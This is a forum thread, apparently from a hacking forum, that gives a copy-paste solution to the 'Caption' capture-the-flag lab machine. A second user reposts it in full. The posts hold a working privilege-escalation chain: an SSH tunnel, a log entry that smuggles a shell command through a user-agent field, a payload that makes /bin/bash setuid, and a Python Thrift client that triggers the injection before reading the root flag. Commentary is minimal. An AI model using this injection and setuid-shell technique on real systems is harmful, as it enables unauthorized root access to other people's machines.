[Holz]

ssh -i id_ecdsa -L 9090:127.0.0.1:9090 margo@caption.htb
 
CREATE THESE FILES ON TARGET MACHINE
--
nano /tmp/malicious.log
127.0.0.1 "user-agent":"'; /bin/bash /tmp/payload.sh #"
 
nano /tmp/payload.sh
chmod +s /bin/bash
 
 
CREATE THIS FILE IN LOCAL MACHINE
---
nano log_service.thrift
 
namespace go log_service
 
service LogService {
    string ReadLogFile(1: string filePath)
}
 
INSTALL THRIFT ON LOCAL MACHINE: sudo apt install python3-thrift
 
thrift -r --gen py log_service.thrift
cd gen-py
 
CREATE FILE ON LOCAL MACHINE:
client.py
 
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService  # Import generated Thrift client code
 
def main():
    # Set up a transport to the server
    transport = TSocket.TSocket('localhost', 9090)
 
    # Buffering for performance
    transport = TTransport.TBufferedTransport(transport)
 
    # Using a binary protocol
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
 
    # Create a client to use the service
    client = LogService.Client(protocol)
 
    # Open the connection
    transport.open()
 
    try:
        # Specify the log file path to process
        log_file_path = "/tmp/malicious.log"

        # Call the remote method ReadLogFile and get the result
        response = client.ReadLogFile(log_file_path)
        print("Server response:", response)

    except Thrift.TException as tx:
        print(f"Thrift exception: {tx}")
 
    # Close the transport
    transport.close()
 
if __name__ == '__main__':
    main()


run script: python3 client.py    

GO TO TARGET MACHINE AND run /bin/bash -p
 cat /root/root.txt

[prx]

ez ctf, great work, i will probably make a thread like this too

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Arrested

[redbaby]

thanks for the write up dude !

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Reposting hidden content for free

[dzcroww]

ssh -i id_ecdsa -L 9090:127.0.0.1:9090 margo@caption.htb
 
CREATE THESE FILES ON TARGET MACHINE
--
nano /tmp/malicious.log
127.0.0.1 "user-agent":"'; /bin/bash /tmp/payload.sh #"
 
nano /tmp/payload.sh
chmod +s /bin/bash
 
 
CREATE THIS FILE IN LOCAL MACHINE
---
nano log_service.thrift
 
namespace go log_service
 
service LogService {
    string ReadLogFile(1: string filePath)
}
 
INSTALL THRIFT ON LOCAL MACHINE: sudo apt install python3-thrift
 
thrift -r --gen py log_service.thrift
cd gen-py
 
CREATE FILE ON LOCAL MACHINE:
client.py
 
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService  # Import generated Thrift client code
 
def main():
    # Set up a transport to the server
    transport = TSocket.TSocket('localhost', 9090)
 
    # Buffering for performance
    transport = TTransport.TBufferedTransport(transport)
 
    # Using a binary protocol
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
 
    # Create a client to use the service
    client = LogService.Client(protocol)
 
    # Open the connection
    transport.open()
 
    try:
        # Specify the log file path to process
        log_file_path = "/tmp/malicious.log"

        # Call the remote method ReadLogFile and get the result
        response = client.ReadLogFile(log_file_path)
        print("Server response:", response)

    except Thrift.TException as tx:
        print(f"Thrift exception: {tx}")
 
    # Close the transport
    transport.close()
 
if __name__ == '__main__':
    main()


run script: python3 client.py    

GO TO TARGET MACHINE AND run /bin/bash -p
 cat /root/root.txt

THANKS FOR SHARE ty

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.